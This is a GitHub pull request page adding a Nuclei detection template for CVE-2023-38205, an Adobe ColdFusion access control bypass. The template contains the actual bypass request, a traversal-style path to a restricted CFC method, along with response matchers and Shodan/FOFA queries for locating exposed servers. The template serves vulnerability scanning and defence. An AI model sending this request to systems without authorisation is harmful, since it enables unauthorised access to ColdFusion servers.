Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create CVE-2023-38205.yaml #7727

Merged
merged 2 commits into from
Jul 21, 2023
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
40 changes: 40 additions & 0 deletions http/cves/2023/CVE-2023-38205.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,40 @@
id: CVE-2023-38205

info:
name: Adobe ColdFusion - Access Control Bypass
author: DhiyaneshDk
severity: high
reference:
- https://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/
- https://helpx.adobe.com/security/products/coldfusion/apsb23-47.html
classification:
cve-id: CVE-2023-38205
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-284
metadata:
max-request: 1
verified: true
fofa-query: app="Adobe-ColdFusion"
shodan-query: http.component:"Adobe ColdFusion"
product: coldfusion
vendor: adobe
tags: cve,cve2023,adobe,auth-bypass,coldfusion

http:
- method: GET
path:
- "{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"

matchers-condition: and
matchers:
- type: regex
regex:
- ([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}

- type: dsl
dsl:
- contains(content_type, "text/html")
- status_code == 200
- len(trim_space(body)) == 106
condition: and
Loading